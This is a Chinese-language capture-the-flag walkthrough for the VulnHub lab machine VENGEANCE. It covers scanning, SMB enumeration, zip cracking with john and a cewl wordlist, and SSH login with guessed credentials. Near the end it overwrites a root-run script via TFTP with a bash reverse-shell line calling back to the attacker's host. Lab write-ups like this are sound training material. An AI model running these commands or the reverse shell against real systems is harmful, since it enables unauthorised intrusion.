2021 brings us the VENGEANCE of digitalworld.local! A box born out of COVID-19. This machine was built whilst the author was mulling over life in infosec whilst doing his PEN-300 course. But the author always has a heart for the OSCP, which explains yet another OSCP-like box, full of enumeration goodness.
If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): VENGEANCE is (#1): all about users making use of other users, (#2): broken hearts, (#3): broken minds.
Note: Always think like a user when enumerating target machine.
Feel free to contact the author at https://donavan.sg/blog if you would like to drop a comment.
https://download.vulnhub.com/digitalworld/VENGEANCE.7z
nmap -sP 192.168.79.0/24
arp-scan -l
靶场真实IP地址为192.168.79.131
nmap -p- -sV 192.168.79.131
可以看到80端口及445端口,可以想到smb服务
我们可以看到报错了,提示我们没有进行域名绑定
我们进行域名和ip绑定
我们可以看到页面返回正常
我们知道smb服务开放,我们进行查看
smbclient -NL 192.168.79.131
有一个文件夹和两个系统用户:sara qinyi,我们进行查看
smbclient -U sarapublic$ \\\\192.168.79.131\\sarapublic$
可以看到好多的文件,我们都下载下来查看
我们可以看到一个压缩包,我们进行爆破
zip2john '/home/kali/桌面/gio.zip' >> MS02423.txt
cat MS02423.txt
john --wordlist=/usr/share/wordlists/rockyou.txt MS02423.txt
我们可以看到没有爆破出来,那么我们就制作一个字典进行爆破
感觉密码应该藏在上面的那几个文件里,那先把那几个文件做成密码本,用 cewl 生成密码本,不过 cewl 是爬取网站中的关键字生成密码的,所以我在本地开启个 http 服务,然后利用 cewl 爬取:
我们可以看到爆破出来的密码是nanotechnological
我们可以看到一个txt文件,一个pptx,一个图片
提示我们信息:应该是找这三个信息,组起来应该是密码。姓名是 ppt 中的名字(一开始姓名都加上了,后来只试了名 Giovanni 才可以)
角在第三页 ppt 的右下角发现了
Suzuka 130R,网站查了一下是铃鹿赛道的 130R (一个弯道),号称是世界上最疯狂的弯角。这样名字、弯道和线路就都有了,组合起来是:
giovanni_130R_Suzuka(试了好几次发现小写 g 能登陆)
之前smb服务发现了两个用户 sara 和 qinyi,尝试用上面的密码 ssh 登陆一下,端口是 22222:
qinyi 用户登陆成功:
ssh qinyi@192.168.79.131 -p 22222
我们查看提权方式,可以看到eaurouge,但是我们没有权限查看
我们运行pspy64,可以看到69端口开放,我们可以使用tftp服务
我们把eaurouge下载下来,进行修改
bash -c 'exec bash -i &>/dev/tcp/192.168.79.128/1234 <&1'
我们进行反弹,可以看到反弹成功
我们查看flag